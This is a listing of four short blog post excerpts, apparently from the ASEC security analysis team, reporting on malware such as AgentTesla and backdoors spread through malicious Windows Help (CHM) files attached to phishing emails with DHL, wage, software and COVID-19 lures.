AgentTesla Being Distributed Through Windows Help File (*.chm) Posted By jcleebobgatenet , June 2, 2022 The ASEC analysis team recently discovered AgentTesla being distributed with a new method. Previously, AgentTesla discussed in multiple ASEC blog posts was distributed by the malicious VBA macro inside PowerPoint files (*.ppt). However, the new method uses Windows Help files (*.chm) to run powershell commands. The malicious CHM files are distributed as compressed files attached to phishing emails imitating emails sent from DHL, a transport company. As phishing emails disguised as other topics are also being distributed, users need to…
Malicious Help File Disguised as Missing Coins Report and Wage Statement (*.chm) Posted By Hansoyoung , May 16, 2022 The ASEC analysis team has discovered a continuous distribution of malware disguised as a Windows Help File (*.chm). The most recent CHM file is identical to the file introduced in <APT Attack Being Distributed as Windows Help File (*.chm)> to download the additional malware. It appears that the CHM file of this type is distributed in the form of a compressed file. The confirmed filenames of the compressed files and internal CHM files are as follows: Names of Compressed Files…
Backdoor (*.chm) Disguised as Document Editing Software and Messenger Application Posted By jcleebobgatenet , May 4, 2022 The ASEC analysis team confirmed that a backdoor malware disguised as document editing software and messenger application used by many Korean users is being distributed in Korea through malicious CHM files. The team recently introduced malicious CHM files distributed in various forms twice in the ASEC blog in March. The malicious files discussed in this post execute additional malicious files via a process that is different from the previous cases. The names of some CHM files that are currently distributed…
Malicious Help File Disguised as COVID-19 Infectee Notice Being Distributed in Korea Posted By jcleebobgatenet , April 5, 2022 The ASEC analysis team introduced readers to malware that takes the form of a Windows help file (*.chm) about two weeks ago. The malicious CHM file that was recently discovered is disguised as a notice for people infected with COVID-19 and is being distributed to Korean users. The attacker is probably distributing the file in such a form because Korea has recently seen a surge in COVID-19 case numbers. The name of the file that is being distributed is shown…
